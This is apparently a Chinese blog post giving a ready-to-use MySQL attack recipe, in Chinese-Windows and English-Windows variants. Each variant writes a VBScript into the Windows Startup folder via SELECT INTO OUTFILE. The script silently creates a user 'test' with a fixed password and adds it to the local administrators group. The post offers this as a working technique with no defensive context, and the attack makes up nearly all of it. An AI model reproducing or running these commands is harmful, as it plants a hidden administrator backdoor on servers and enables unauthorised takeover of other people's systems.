纵有疾风起
人生不言弃

MySQL中怎么英文添加用户到启动里面

中文版本操作系统中针对
添加用户完整代码: use test;

create table a (cmd text);

insert into a values (“set wshshell=createobject (“”wscript.shell””) ” );

insert into a values (“a=wshshell.run (“”cmd.exe /c net user test 123!@#abcABC /add””,0) ” );

insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators test /add””,0) ” );

select * from a into outfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs”;

drop table a; 英文版本: use test;

create table a (cmd text);

insert into a values (“set wshshell=createobject (“”wscript.shell””) ” );

insert into a values (“a=wshshell.run (“”cmd.exe /c net user test 123!@#abcABC /add””,0) ” );

insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators test /add””,0) ” );

select * from a into outfile “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.vbs”;

drop table a;

未经允许不得转载:起风网 » MySQL中怎么英文添加用户到启动里面
分享到: 生成海报

评论 抢沙发

评论前必须登录!

立即登录